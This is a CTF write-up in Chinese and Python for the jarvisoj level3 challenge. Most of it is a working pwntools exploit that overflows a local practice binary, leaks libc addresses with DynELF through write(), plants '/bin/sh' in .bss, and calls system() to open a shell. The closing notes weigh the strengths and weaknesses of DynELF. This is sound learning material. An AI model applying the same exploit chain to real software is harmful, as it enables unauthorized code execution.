题目:jarvisoj_level3
from pwn import *

# Log every tube send/recv so the exchange with the binary can be followed.
context.log_level = 'debug'

# The practice binary (jarvisoj level3): one live process plus a static ELF
# view of the same file for symbol lookups.
BINARY = "/home/Kaguya/桌面/Resolve/level3"
io = process(BINARY)
elf = ELF(BINARY)

# Addresses that come straight from the binary's own tables. Only system()
# lives in libc and has to be located at run time (see DynELF below).
write_addr = elf.symbols['write']                  # write entry as pwntools exposes it (PLT stub for an import)
vulner_addr = elf.symbols['vulnerable_function']   # function containing the overflowable read
write_got = elf.got['write']                       # GOT slot of write; not used further in this script
main = elf.sym['main']
read_plt = elf.symbols['read']                     # read entry (PLT stub)
bss_addr = elf.bss()                               # writable scratch area in .bss

# 0x88 bytes of buffer plus 4 bytes to reach the saved return address
# (presumably the saved EBP on this 32-bit target — confirm against the
# disassembly of vulnerable_function).
padding = b'A' * (0x88 + 0x04)
def leak(address):
    """Return the 4 bytes stored at ``address`` in the target process.

    DynELF callback: the chain calls ``write(1, address, 4)`` and then
    returns into ``main`` so the process stays alive and can be queried
    again for the next address.
    """
    chain = b''.join([
        padding,
        p32(write_addr),   # return into write
        p32(main),         # write's return address: back to main for the next query
        p32(1),            # fd  = stdout
        p32(address),      # buf = address being read
        p32(4),            # count
    ])
    io.recvuntil(b'Input:\n')
    io.send(chain)
    leaked = io.recv(4)    # NOTE: tube.recv(4) returns *up to* 4 bytes
    return leaked
# Locate system() in the target's libc by walking its structures through leak().
d = DynELF(leak, elf=ELF("/home/Kaguya/桌面/Resolve/level3"))
systemAddress = d.lookup('system', 'libc')

# Stage 2: read(0, bss_addr, 8) stores 8 bytes from stdin into .bss, then
# returns into vulnerable_function for one more overflow.
stage_read = [read_plt, vulner_addr, 0x0, bss_addr, 0x8]
payload2 = padding + b''.join(p32(v) for v in stage_read)
io.send(payload2)
io.send(b'/bin/sh\x00')          # the 8 bytes that read() places at bss_addr

# Stage 3: system(bss_addr); the return-address slot after system is left as 0.
stage_system = [systemAddress, 0, bss_addr]
payload3 = padding + b''.join(p32(v) for v in stage_system)
io.sendline(payload3)
io.interactive()
def leak(address):
    """DynELF callback: return the 4 bytes the target holds at ``address``.

    Same helper as the one defined earlier in the file, repeated here for
    the discussion that follows.
    """
    frame = p32(write_addr) + p32(main)        # call write, then return to main
    args = p32(1) + p32(address) + p32(4)      # write(stdout, address, 4)
    io.recvuntil(b'Input:\n')
    io.send(padding + frame + args)
    return io.recv(4)
# Same resolution step as above: DynELF drives leak() repeatedly until it
# can pin down system() inside the target's libc.
d = DynELF(
    leak,
    elf=ELF("/home/Kaguya/桌面/Resolve/level3"),
)
systemAddress = d.lookup('system', 'libc')
DynELF不能直接泄露/bin/sh的地址,因此需要使用read函数手动输入。
但是相比之下DynELF的优势是快,并且用起来简单。
实际上操作DynELF比较麻烦,也容易报错,可能是我自己的问题。
并且需要联网,在比赛中不能使用。
无论如何也是一种做题的方法,记一笔。